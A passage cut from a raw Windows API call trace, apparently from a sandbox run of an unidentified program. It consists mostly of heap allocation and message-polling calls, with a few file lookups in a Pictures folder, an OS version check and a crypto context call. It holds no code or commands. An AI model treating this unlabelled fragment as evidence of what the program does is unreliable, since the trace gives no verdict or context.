0x24b6ad0 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0254.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0254.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0254.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.897] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.898] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0254.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0254.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/E3PCt.png", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4be920, ftCreationTime.dwHighDateTime=0x1d4c90a, ftLastAccessTime.dwLowDateTime=0x9548a390, ftLastAccessTime.dwHighDateTime=0x1d4c80e, ftLastWriteTime.dwLowDateTime=0x9548a390, ftLastWriteTime.dwHighDateTime=0x1d4c80e, nFileSizeHigh=0x0, nFileSizeLow=0x7dc5, dwReserved0=0xa0a0047, dwReserved1=0x1d156, cFileName="E3PCt.png", cAlternateFileName="")) returned 0xaa5860 [0254.899] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0254.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.900] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0254.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0254.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0254.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.901] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.901] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.902] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.902] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.902] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.902] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.902] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.902] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.903] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.903] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.903] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.904] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.905] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.906] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.906] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.906] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0254.906] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.906] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0254.906] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.906] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.906] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.906] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.906] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.906] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.906] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0254.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0254.906] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.907] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.907] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.907] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.907] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.907] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.907] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0254.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.909] RtlAllocateHeap 